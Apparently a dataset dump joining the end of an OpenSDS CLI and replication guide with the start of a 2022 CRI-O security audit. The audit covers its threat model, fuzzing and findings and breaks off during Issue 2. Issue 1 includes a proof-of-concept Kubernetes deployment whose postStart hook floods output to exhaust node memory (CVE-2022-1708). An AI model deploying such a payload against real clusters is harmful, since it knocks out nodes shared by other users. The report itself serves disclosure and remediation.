on hostB, change availabilityZone to a new value. Here is an example: tgtBindIp: 192.168.0.66 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 49 tgtConfDir: /etc/tgt/conf.d pool: opensds-volumes-default: diskType: NL-SAS availabilityZone: secondary extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 5ms \n Create Replication Start services on HostA: • cd /opt/opensds/bin • ./etcd --advertise-client-urls http://192.168.0.131:62379 --listen-client-urls http://192.168.0.131:62379 --listen-peer-urls http://192.168.0.131:62380 --data-dir /opt/opensds/etcd/data >> /var/log/opensds/etcd.log 2>&1 & • ./osdslet & • ./osdsdock & • ./osdsdock --config-file /etc/opensds/attacher.conf & Start services on HostB: • ./osdslet & • ./osdsdock & • ./osdsdock --config-file /etc/opensds/attacher.conf & Create volumes (run them on HostA or hostB): • ./osdsctl volume create 1 -n primary • ./osdsctl volume create 1 -n secondary -a secondary Create replication: • ./osdsctl replication create e0b1c9e3-0c88-4601-b0e7-c09448a89e5c 3ea2e681-4884-4d84-a2e3-d5e3318763b2 \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 50 \n Check result See the block device. Create some data on HostA. • mkfs.ext4 /dev/drbd1 • mount /dev/drbd1 ./reptest/ • touch test • dd if=/dev/zero of=./2 bs=1M count=500 • touch test • …… Check the synchronous status on both hosts. Check if the data is updated on HostB. • umount on HostA • mount on HostB • Check data on HostB, and you can see the data is updated. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 51 6 OpenSDS CLI Guide 6.1 List Docks Use the following command to display the docks information. osdsctl dock list Sample results are as follows: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl dock list -h Results are as follows: \n Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 52 \n 6.2 List Pools Use the following command to display the pools information. osdsctl pool list Sample results are as follows: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl pool list -h Results are as follows: \n Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 53 6.3 Create/Delete Profile Use the following command to create profile. osdsctl profile create * Example: \n Use the following command to delete profile. osdsctl profile delete * Example: 6.4 Create/Delete/Get/List Volume(s) Use the following command to create volume. osdsctl volume create 3 Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 54 Use the following command to display the volume details. osdsctl volume show * Example: \n Use the following command to delete the volume. osdsctl volume delete * Example: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume list -h Results are as follows: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 55 Example: 6.5 Create/Delete/Get/List Snapshot(s) Use the following command to create snapshot. osdsctl volume snapshot create * Example: \n Use the following command to display snapshot details. osdsctl volume snapshot show * Example: \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 56 Use the following command to delete snapshot. osdsctl volume snapshot delete * Example: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume snapshot list -h Results are as follows: \n 6.6 Create Volume from Snapshot Use the following command to create volume from snapshot. osdsctl volume create 1 –s * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 57 6.7 Expand Volume Use the following command to expand volume size. osdsctl volume extend * * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 58 6.8 Create/Update/Delete/Get/List Volume Groups Use the following command to create volume group. osdsctl volume group create –-profiles * Example: \n Use the following command to update volume group. osdsctl volume group update groupId -a “volumeId1, volumeId2” * Use the following command to show volume group. osdsctl volume group show * \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 59 Example: \n Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume group list -h Results are as follows: \n Example: Use the following command to update volume group. osdsctl volume group update * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 60 Use the following command to delete volume group. osdsctl volume group delete * Example: 6.9 Replication Here is the usage of replication CLI. 1. Create replication. Usage: osdsctl replication create <primary volume id> <secondary volume id> [flags] Flags: -d, --description string the description of created replication -h, --help help for create -n, --name string the name of created replication -p, --primary_driver_data string the primary replication driver data of created replication -m, --replication_model string the replication mode of created replication, value can be sync/async \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 61 -t, --replication_period int the replication period of created replication, the value must greater than 0 (default 120) -s, --secondary_driver_data string the secondary replication driver data of created replication 2. List replication. Usage: osdsctl replication list [flags] Flags: -h, --help help for list Global Flags: --debug shows debugging output. 3. Show a replication Usage: osdsctl replication show <replication id> [flags] Flags: -h, --help help for show Global Flags: --debug shows debugging output. 4. Enable replication. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 62 Usage: osdsctl replication enable <replication id> [flags] Flags: -h, --help help for enable Global Flags: --debug shows debugging output. 5.disable replication Usage: osdsctl replication disable <replication id> [flags] Flags: -h, --help help for disable Global Flags: --debug shows debugging output. 6. Failover replication Usage: osdsctl replication failover <replication id> [flags] Flags: -a, --allow_attached_volume whether allow attached volume when failing over replication -h, --help help for failover -s, --secondary_backend_id string the secondary backend id of failoverr replication OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 63 Global Flags: --debug shows debugging output. 7. delete replication Usage: osdsctl replication delete <replication id> [flags] Flags: -h, --help help for delete Global Flags: --debug shows debugging output. " } ]
{ "category": "Runtime", "file_name": "2022_security_audit_adalogics.pdf", "project_name": "CRI-O", "subcategory": "Container Runtime" }
[ { "data": "P R E S E N T S \nC R I - O S e c u r i t y A u d i t\nIn collaboration with the CRI-O project maintainers and The Open Source Technology\nImprovement Fund, Inc (OSTIF), Cloud Native Computing Foundation and Chainguard.\nostif.org\nA u t h o r s\nAdam Korczynski\n<\nadam@adalogics.com\n>\nDavid Korczynski\n<\ndavid@adalogics.com\n>\nDate: 6 June 2022\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\nCRI-O security audit, 2022\nExecutive summary\nThis report outlines a security engagement of the CRI-O project. CRI-O is an implementation\nof the Kubernetes Container Runtime Interface. The goal of this engagement was to conduct\na holistic security assessment of CRI-O, which means that the engagement had several\nhigh-level tasks.\nThis security audit was performed by Ada Logics in collaboration with CRI-O maintainers,\nOSTIF, CNCF and Chainguard. Ada Logics performed the security work described in the first\npart of the report and Chainguard carried out a supply chain security assessment, which is\nfound in the report appendix.\nThe assessment includes four high-level tasks:\n●\nThreat model formalisation of CRI-O.\n●\nFuzzing integration of CRI-O into OSS-Fuzz, including fourteen designated fuzzers.\n●\nManual code auditing.\n●\nDocumentation/testing review\nMost of the efforts in the engagement were spent on the first three items listed above, and\nparticularly much on fuzzing and code auditing.\nThe primary security finding of the work is a single high-severity issue. A few minor issues\nwere found as well, however, our view from completing this audit is that CRI-O is a\nwell-written project that has a high level of security assurance.\nThe high severity finding is a denial of service attack on a given cluster by way of resource\nexhaustion of nodes. The attack is performed by way of pod creation, which means any user\nthat can create a pod can cause denial of service on the given node that is used for pod\ncreation. The CVE for this vulnerability is\nCVE-2022-1708.\nInterestingly, the denial of service attack also occurred in other container runtime interface\nimplementations, most notably Containerd. Specifically, the exact same attack that exhausts\nmemory in CRI-O can be used to exhaust memory of Containerd. The CVE for the\ncorresponding Containerd issue is\nCVE-2022-31030.\nThe Github security advisories for the denial of service attacks are:\n●\nCRI-O:\nhttps://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j\n●\nContainerd:\nhttps://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-\nmxpf\nIn the remainder of this report we will iterate through each of the tasks in more detail, and\nthe findings are listed at the end of the report.\nThe work in this report (excluding appendix) was done by Ada Logics over the duration of 25\nworking days.\n2\nCRI-O security audit, 2022\nTable of Contents\nExecutive summary\n2\nThreat model formalisation\n5\nCRI-O architecture & components\n5\nCrio binary\n5\nConmon\n6\nPinns\n6\nRuntime service\n6\nContainers/image and containers/storage\n6\nContainer Network Interface\n6\nCRI-O attack surface enumeration\n7\nCRI-O gRPC server\n7\nConmon\n7\nPinns\n7\nRuntime service\n8\nContainers/image and containers/storage\n8\nContainer Network Interface\n8\nCode audit\n9\nFuzzing integration\n11\nTesting and documentation\n13\nIssues found\n14\nIssue 1: High: Cluster DOS by way of memory exhaustion\n15\nIssue 2: Medium: Temporary exhaustion of disk resources on a given node\n1\n8\nIssue 3: Low: Use of deprecated library io/ioutil\n1\n9\nIssue 4: Low: Timeouts in container creation routines due to device specifications\n20\nIssue 5: Low: Unhandled errors from deferred file close operations\n21\nIssue 6: Informational: Missing nil-pointer checks in json unmarshalling\n2\n2\nAppendix:\nSoftware Supply Chain Security Audit CRI-O\n2\n3\nTable Of Contents\n2\n5\nEngagement Overview\n2\n6\nChainguard Company Overview\n2\n6\nExecutive Summary\n2\n6\nSoftware Supply Chain Security Background\n2\n6\nGoals\n2\n8\nInterviews & Engagement Model\n2\n8\nFindings\n2\n8\nBuild\n2\n8\nSource Code\n2\n8\nDeploy\n2\n9\nMaterial Verification\n2\n9\nSLSA Overview\n29\n3\nCRI-O security audit, 2022\nSLSA Findings\n2\n9\nSLSA Assessment Table\n2\n9\nRecommendations and Remediations\n3\n2\nDocument the Release Process, Draft Policy\n3\n3\nSystem Generated Provenance and SBOM\n3\n3\nPush towards SLSA compliance, all the way to Level 3\n3\n3\nAutomate Package Builds\n3\n4\nSources\n3\n5\n4\nCRI-O security audit, 2022\nThreat model formalisation\nIn this section we outline the threat modelling of CRI-O. The goal of this effort was to\nconstruct an understanding of CRI-O in order to outline a suitable attack surface which can\nbe used throughout the engagement. The goal is to both construct a model that is both\nuseful for manual auditing as well as fuzzer creation. To do this, we extract the logical\ncomponents of CRI-O and identify the potential application security issues that may exist.\nCRI-O architecture & components\nThe architecture diagram of CRI-O provides a convenient way to identify these. In the\nfollowing we go through each of the components to highlight their importance and security\nrelevance.\nDiagram from\nhttps://cri-o.io\nCrio binary\nThe central component of the CRI-O architecture is the crio binary itself. This application is\nin charge of facilitating communication between kubelet and the rest of the components that\nCRI-O uses, such as container runtimes and container registries. The crio binary runs by\nway of a gRPC server which implements the\nKubernetes\nContainer Runtime Interface\n.\nThe execution environment of the crio binary is particularly relevant to the security analysis\nof CRI-O. In particular, crio is always meant to:\n1.\nOnly communicate with the Kubelet, despite it in theory being able to work as a\ngRPC server independently of Kubelet.\n2.\nRun as a systemd daemon.\n5\nCRI-O security audit, 2022\nThe importance of the crio binary only communicating with the Kubelet is important because\nthe Kubelet handles a lot of the sanitization of user input before it reaches CRI-O.\nFurthermore, much of the input that reaches CRI-O is auto-generated by Kubelet and follows\na certain set of restrictions. This is important for the threat model of CRI-O because many\nsecurity issues will arise in the event that the gRPC server runs independently of Kubelet.\nThe fact that the gRPC server runs by way of the Kubelet makes it more complicated to\nassess the complete security posture of CRI-O. This is because in order to understand the\npotential input space CRI-O has it is necessary to navigate through the Kubelet, and the\nKubelet will perform various sanitizations as well as generate data that is passed on to\nCRI-O.\nFor the above reasons, it’s imperative to stress: CRI-O is only meant to be run by way of the\nKubelet and if this is not satisfied then there are no guarantees from CRI-O about being\nsecure.\nThe crio binary itself handles a lot of communication and managing of the other components\ninvolved in the CRI-O ecosystem. We will now iterate through several of the important ones.\nConmon\nIs a small utility application working as a monitoring and communication tool between CRI-O\nand OCI runtimes, e.g. runc in the CRI-O case. A Conmon process is launched for each\ncontainer started by the crio binary.\nPinns\nThe Pinns utility is a small program that lives in the CRI-O repository\nhere\nand is used to set\nkernel parameters at runtime. Notably, this utility was a core part of the container escape in\nCVE-2022-0811\n. The problem that occurred was from\na high-level perspective that the Pinns\nutility could be used to set arbitrary kernel parameters, whereas CRI-O aims to only allow\nsetting a few selected and pre-determined kernel parameters.\nRuntime service\nCRI-O implements the Kubernetes Container Runtime Interface with focus on using runtimes\ncompatible with the\nOpen Container Initiative Runtime\nSpecification\n. The runtime service\ncomponent in the CRI-O architecture is thus runtimes that implement this specification, such\nas\nrunc\n.\nContainers/image and containers/storage\nThe\ncontainers/image\nand\ncontainers/storage\nprojects\nare used by CRI-O to pull images\nfrom container registries as well as storing the file systems on disk, respectively.\nContainer Network Interface\nCRI-O uses the\nContainer Network Interface\nto configure\nnetwork interfaces for its pods.\n6\nCRI-O security audit, 2022\nCRI-O attack surface enumeration\nIn this section we outline the attack surface enumeration. The goal is first and foremost to\noutline relevant areas of potential attacks to be analysed throughout this engagement. In this\ncontext, we focus on identifying an attack surface that we can assess in line with the scope\nof the audit.\nThe focus of the attack surface enumeration is to highlight where breaking of trust\nrelationships in CRI-O may be possible and also areas of potential vulnerabilities in the\ncomponents outlined above.\nThe focus of our attack surface enumeration is also to identify the scope of the security in\nCRI-O.\nCRI-O gRPC server\nA central part of the attack surface of CRI-O is the gRPC server itself. The gRPC server\nitself accepts input from the Kubelet and a lot of security measures are handled by\nKubernetes before passing the data over to the gRPC server.\nDue to the relationship between Kubernetes and the CRI, the important part for the gRPC\nserver is that each of the gRPC handlers will only perform the operations expected by the\ngRPC handler and only those. There should be no unintended side-effects.\nThe gRPC server runs as a daemon on each Kubernetes node. This means a key threat to\nCRI-O is if the gRPC server can be used to perform unintended behaviour on the node\nwhich can be used for malicious purposes.\nThe gRPC server doesndles a lot of handling of other components on the node, e.g.\nConmon, OCI runtime and Pinns. The communication and management of these\ncomponents is an area of attack surface, e.g. command injections or passing of malicious\ndata to the other components.\nConmon\nA conmon process is launched for each container on the node managed by CRI-O. Conmon\nis thus a ubiquitous part of the system. Conmon is written in C and susceptible to memory\ncorruption attacks. User input originating from the gRPC server is passed to Conmon and\ninput from the container’s are also handled in Conmon. These are areas of potential attack\nsurface against Conmon.\nPinns\nThe central attack surface to the Pinns utility is whether it can be abused to set undesired\nkernel runtime parameters. This is the style that the recent attack leveraged in\nCVE-2022-0811\n. In addition to this, Pinns is written\nin C which means it is susceptible to\nmemory corruption issues.\n7\nCRI-O security audit, 2022\nRuntime service\nThe runtime service plays a big role in CRI-O. The attack surface of the runtime\nimplementations themselves is out of scope of CRI-O. However, the communication\nchannels and configuration between CRI-O and the runtime implementations is an area of\nattack surface.\nContainers/image and containers/storage\nThe\ncontainers/image\nand\ncontainers/storage\nlibraries\nare used to handle container images.\nEach of these projects should be treated as potential areas of issues, such as mishandling of\ndata that can affect CRI-O.\nThe containers/image\nrelies on dependencies with substantial\ncomplexity\nthat are written in\nmemory unsafe languages, e.g. OSTree. In this sense, although CRI-O is mainly written in\nthe Go programming language it has close dependencies that are written in memory unsafe\nlanguages.\nThe communication between the container registries and CRI-O is also an area of attack\nsurface. The network communication needs to be done in a secure manner.\nContainer Network Interface\nThe Container Network Interface\nis used by CRI-O to\nconfigure container networking. The\nattack surface of the CNI itself is out of the scope of CRI-O. However, the communication\nchannels and configuration between CRI-O and the CNI is an area of attack surface.\n8\nCRI-O security audit, 2022\nCode audit\nIn this section we outline the main efforts in manually auditing CRI-O and, specifically, we\ndetail how we enumerated the attack surface defined above.\nAuditing of gRPC entrypoints.\nA thorough auditing of the gRPC handlers were undertaken in an effort to both understand\nthe CRI-O daemon in detail as well as outline any potential areas for flaws. This is the main\nentrypoint for communication from CRI-O’s perspective and is thus where the majority of the\nauditing efforts were dedicated.\nThe first step was to audit the code from the entrypoint of the gRPC handlers’ and follow the\npossible code paths. At first the effort during the auditing was made to understand the details\nof the code, and then further reviews of the code were performed to assess security issues.\nDuring this auditing we focused on mishandling of untrusted input:\n●\nCommand injections for all code paths where crio ends up in exec calls. This\nincludes calls to e.g. conmon andr.path\n(often runc).\nThe arguments were traced\nto the origins in the gRPC messages.\nIn general, this found no possibilities for command injection due to the use of proper\ncommand execution handling. However, we found that in general there was a lack of\nsanitization on user input, though, none of which had any security issues at this\nmoment in time.\n●\nImproper file handling. We focused on cases for malevolent file operations such as\npath traversals and read/write of files in undesired ways.\n●\nManipulation of logging messages and whether user-controlled data can affect the\nintegrity of logs or non-repudiation issues. We found that there was lack of\nsanitization on the user input to the logs, which means that in certain circumstances\nthe gRPC server’s logs can be tainted if the unsanitized variables include a newline\ncharacter. However, this was deemed to have no security implications because:\n○\nThe arguments that were unsanitised were created by Kubernetes.\n○\nThe gRPC server is meant to run as a daemon and journalctl escapes the\nnewline characters.\nWe still recommend the CRI-O maintainers to log data strings from input to CRI-O by\nway of using the “%q\n” format string rather than “%s\n”.\nSometimes in the code this is\ndone interchangeably for the same variable, such as forreq.ContainerId\nhere\n:\nlog.Infof(ctx,\"Starting container: %s\", req.ContainerId)c, err := s.GetContainerFromShortID(req.ContainerId)iferr !=nil{returnstatus.Errorf(codes.NotFound,\"could notfind container %q:%v\", req.ContainerId, err)\nWe recommend sticking with the “%q\n”.\nThe second step was to perform a bottom-up approach of vulnerable primitives in the gRPC\nserver. The methodology of this effort was by starting from possible vulnerability primitives\nand from a bottom-up effort to determine if a potential vulnerable primitive was in fact\n9\nCRI-O security audit, 2022\nvulnerable. This included auditing all:\n●Os.exec\nAPIs\n●\nFile operations\n●\nCommand executions\n●\nLogging operations\nThis worked well, in that following the bottom-up approach after having a good\nunderstanding of the whole flow, we found the problem described in Issue 1 of this report.\nConmon auditing\nA thorough auditing of the Conmon utility was performed. Conmon is written in the C\nprogramming language and is thus vulnerable to memory corruption issues. The focus of this\nauditing was finding any memory corruption issues as well as logical issues that may exist.\nIn the auditing we looked at whether misuse of parameters is possible, e.g. to exploit code\nby way of memory corruption issues. We also developed a fuzzer for Conmon to analyse the\nlogging and parsing routines inconmon/src/ctr_logging.c\n.\nNo issues were found.\nOSTree auditing\nDuring the initial phase of understanding the CRI-O source code we identified\ncontainers/image depends on libostree. Libostree is a complex application written in the C\nlanguage, and, because of that, we made the decision early in the process to integrate\nlibostree into OSS-Fuzz in this\nPR\n. However, in collaboration\nwith the CRI-O maintainers it\nwas later determined OSTree is not an important dependency since CRI-O does not rely\nexplicitly on OSTree, and, therefore, we focused our efforts elsewhere.\nPinns utility auditing\nThe pinns utility was audited for memory corruption issues and mishandling of user input.\nWe also assessed the possibility of configuring undesired kernel parameters by way of/proc/sys\nvirtual filesystem, and the options for\nwhat is set in Pinns is also guarded in the\ngRPC server with the guards in\npkg/config/sysctl.go\nApplying CodeQL and gosec tools on gRPC server\nFinally, we ran two automated security analysis tools against the CRI-O code, specifically\nCodeQL (\nhttps://lgtm.com/\n) and Gosec (\nhttps://github.com/securego/gosec\n).\nWe assessed\nthe reports and validated the findings of them in terms of security relevance.\nIntegrating CodeQL and Scorecards to the CI\nAs part of our efforts here we integrated CodeQL and\nScorecard\nGithub actions. These are\nnow run on each PR made to CRI-O.\nAlthough we found none of the issues reported as being exploitable, CodeQL did report a\nhandful of coding issues. These have been addressed\nhere\n.\n10\nCRI-O security audit, 2022\nFuzzing integration\nIn this section we outline the fuzzing work of CRI-O. The main goal of fuzzing CRI-O was to\nset up continuous fuzzing by way of OSS-Fuzz that achieves a high level of code coverage.\nThe main challenge of this task was to set up infrastructure to make fuzzing of CRI-O work.\nCRI-O relies on many components and binaries existing on the system, as well uses a fairly\ncomplex testing framework, e.g. many mocks.\nIn summary, we implemented 14 fuzzers targeting the CRI-O code, as well as\ncontainers/image and containers/store, and integrated the project into\nOSS-Fuzz\n. The\nfuzzers are available at\nhttps://github.com/cncf/cncf-fuzzing/tree/main/projects/cri-o\nand the\nOSS-Fuzz integration is available at\nhttps://github.com/google/oss-fuzz/tree/master/projects/cri-o\n.\nThe primary focus of the fuzzing was to target the gRPC handlers. This is mainly done by\nfuzz_server\nwhich is a fairly large fuzzer consisting\nof 900 lines of code. This fuzzer initiates\na gRPC server and sends sequences of random messages to the server. In this way, the\nfuzzer has a significant reach throughout the code of CRI-O. However, it’s important to note\nhere that the fuzzer is an over-approximation of the values that are actually possible to have\nin CRI-O, in that the fuzzer generates arbitrary data that is not sanitised by all the Kubelet\nlogic, i.e. much of the data send will not be possible to receive through Kubelet. The fuzzer,\nregardless, found an interesting issue (issue 4 in this report).\nThe following table provides source code to all of the fuzzers developed.\nFuzzer\nSource code\nfuzz_server\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/fuzz_server.go\nfuzz_container_server\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/container_server_fuzzer.go\nfuzz_copy_image\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer2.go\nfuzz_container\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/container_fuzzer.go\nfuzz_apparmor\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_apparmor_fuzzer.go\nfuzz_blockio\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_blockio_fuzzer.go\nfuzz_config\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_fuzzer.go\nfuzz_generate_passwd\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o\n11\nCRI-O security audit, 2022\n/utils_fuzzer.go\nfuzz_get_decryption_keys\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/server_fuzzer2.go\nfuzz_idtools_parse_id_map\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/server_fuzzer2.go\nfuzz_parse_image_name\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer.go\nfuzz_parse_store_reference\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/ParseStoreReference_fuzzer.go\nfuzz_rdt\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_rdt_fuzzer.go\nfuzz_shortnames_resolve\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer.go\n12\nCRI-O security audit, 2022\nTesting and documentation\nAn area of interest from the CRI-O maintainers was our view on the testing and\ndocumentation of CRI-O.\nIn short, we found the testing of CRI-O to be extensive and of high quality. The testing of the\ngRPC server is extensive, but we found no unit testing of the Pinns utility. Pinns is a small\ncomponent of CRI-O and this may be the reason why there is no unit testing. One\nrecommendation we have in this context is to include more thorough unit tests for Pinns, in\nparticular to also detect regressions that may be related to\nCVE-2022-0811\n.\nWe found the documentation of CRI-O and its internals to be very limited and almost\nnon-existing. This was problematic from a perspective of getting to understand the code in\ndetail. A lot of this engagement was spent in walking through the code to extract a thorough\nunderstanding, and this could be improved with more technical documentation.\nIn the context of documentation, theman\npages and\nthe tutorials in\n/tutorials\nwere of\nsignificant help, as well as the (limited) documentation on\nhttps://cri-o.io\n.\nDue to the nature of CRI-O’s security model it’s imperative to be able to assess CRI-O (and\ncustom versions of it) by way of Kubernetes. Our approach to this ended up being using\nCRI-O in Minikube and transferring custom crio binaries into the Minikube cluster from our\nlocalhost. In this way we could attack CRI-O from a Kubernetes user’s perspective while\ndebugging CRI-O with custom modifications. In the context for future security work it would\nbe of great benefit to have tutorials or guides on how to deploy custom CRI-O binaries (or at\nleast the gRPC server) onto a cluster, and perhaps for multiple common Kubernetes testing\nenvironments (i.e. not limited to\ntutorials/Kubernetes.md\n).\n13\nCRI-O security audit, 2022\nIssues found\nIn this section we outline and detail the issues found in CRI-O. The following table\nsummarises the issues found and in the remaining parts of the report we go into detail with\neach of the issues.\nIssue number\nTitle\nSeverity\nDifficulty\nADA-CRIO-22-01\nCluster DOS by way of memory exhaustion\nHigh\nLow\nADA-CRIO-22-02\nTemporary exhaustion of disk resources on \na given node\nMedium\nLow\nADA-CRIO-22-03\nUse of deprecated library io/ioutil\nLow\nHigh\nADA-CRIO-22-04\nTimeouts in container creation routines due \nto device specifications\nLow\nHigh\nADA-CRIO-22-05\nUnhandled errors from deferred file close \noperations\nLow\nHigh\nADA-CRIO-22-06\nMissing nil-pointer checks in json \nunmarshalling\nInformational\nHigh\n14\nCRI-O security audit, 2022\nIssue 1: High: Cluster DOS by way of memory exhaustion\nSeverity\nHigh\nDifficulty\nLow\nTargetExecSync\ngRPC handler andinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-01\nFound by\nManual auditing\nTheExecSync\nrequest runs commands in a container\nand logs the output of the command.\nThis output is then read by CRI-O after command execution, and it is read in a manner\nwhere the entire file corresponding to the output of the command is read in. Thus, if the\noutput of the command is large it is possible to exhaust the memory of the node when crio\nreads output of the command.\nA similar, although manifested by way of different underlying code, also exists in Containerd\nand the exact same attack as outlined here can be used on Containerd.\nThe CVE for this vulnerability is\nCVE-2022-1708 for\nCRI-O and\nCVE-2022-31030 for\nContainerd,\nand the Github security advisories for\nthis issue are:\n●\nCRI-O:\nhttps://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j\n●\nContainerd:\nhttps://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-\nmxpf\nThe specific code that loads the logged output is\nhere\n:\n//XXX:Currently runC dups the same console overboth stdout andstderr,// so we can't differentiate between the two.logBytes, err := ioutil.ReadFile(logPath)iferr !=nil{returnnil, &ExecSyncError{Stdout: stdoutBuf,Stderr: stderrBuf,ExitCode:-1,Err: err,}}\nThe following deployment is an example yaml file that will log many gigabytes of ‘A’\ncharacters, which will be read by the above lines. Depending on the machine this will\nexhaust the memory available.\n15\nCRI-O security audit, 2022\napiVersion:apps/v1kind:Deploymentmetadata:name:nginx-deployment100spec:selector:matchLabels:app:nginxreplicas:2template:metadata:labels:app:nginxspec:containers:-name:nginximage: nginx:1.14.2ports:-containerPort:80lifecycle:postStart:exec:command:[\"/bin/sh\",\"-c\",\"for i in `seq1 5000000`; doecho -n'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n16\nCRI-O security audit, 2022\nAAAAAAAAAAAAAAAAAAA'; done\"]preStop:exec:command:[\"/bin/sh\",\"-c\",\"echoBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\"]\nSeverity\nis high since anyone who can create pods\non the cluster can exhaust the memory\non the nodes of the cluster.\nDifficulty\nis low because the vulnerability is easy\nto exploit. However, in order to create\ndeployments on the cluster a user is required to have already gained some privileges.\nRemediation:\nThe solution to this problem involved a patch to CRI-O that limited the number of bytes that\nwere read from logFile written by conmon. Since\nthe\ndockershim\npreviously set a limit of 16\nMB for this buffer, the same size was adopted by CRI-O.\n17\nCRI-O security audit, 2022\nIssue 2: Medium: Temporary exhaustion of disk resources on a given\nnode\nSeverity\nMedium\nDifficulty\nLow\nTargetExecSync\ngRPC handler andinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-02\nFound by\nManual auditing\nTheExecSync\nrequest runs commands in a container\nand logs the output of the command.\nThus, if the output of the command is large it is possible to exhaust the storage of the node\nas all output is stored on disk.\nThis is orthogonal to issue 1, but is a separate issue that should also be considered.\nKubernetes allows users to specify storage limitations to pods, and it is possible by users to\nbypass this, at least in the sense of taking up more storage than asked for, in a temporary\nmanner by way of logging.\nRemediation:\nFor this vulnerability, the fix lies in conmon, since conmon is the entity writing the exec log to\ndisk. Conmon will introduce the `--log-global-size-max` option, which counts the number of\nbytes that have 